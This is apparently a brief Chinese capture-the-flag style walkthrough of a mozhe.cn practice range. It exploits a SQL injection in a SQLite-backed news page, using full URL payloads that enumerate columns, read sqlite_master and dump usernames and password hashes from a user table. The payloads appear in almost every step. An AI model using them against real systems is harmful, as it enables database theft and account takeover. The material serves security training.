地址:https://www.mozhe.cn/bug/detail/UzRPT0FZSTZDeWVid2duMVcyV055dz09bW96aGUmozhe
1.打开靶场环境,发现熟悉的通告
2.输入单引号(异常)、and 1=1、and 1=2(异常)判断存在有SQL注入存在
http://219.153.49.228:45494/new_list.php?id=1%20and%201=2
3.判断列 order by 4返回正常,order by 5返回失败,说明存在4列
http://219.153.49.228:45494/new_list.php?id=1 order by 4
4.判断回显位置
http://219.153.49.228:45494/new_list.php?id=1%20union%20select%201,2,3,4
由于根据题意可知是sqlite数据库,许多MySQL数据库的语法不能使用。但是SQLite 存在一个表sqlite_master ,里面的字段:type/name/tbl_name/rootpage/sql记录着用户创建表的信息
5.确定这个表的字段值
http://219.153.49.228:45494/new_list.php?id=1 union select 1,name,sql,4 from sqlite_master limit 0,1
6.确定用户名和密码
http://219.153.49.228:45494/new_list.php?id=1 union select 1,name,password,4 from WSTMart_reg
7.MD5解密
8.登陆获取key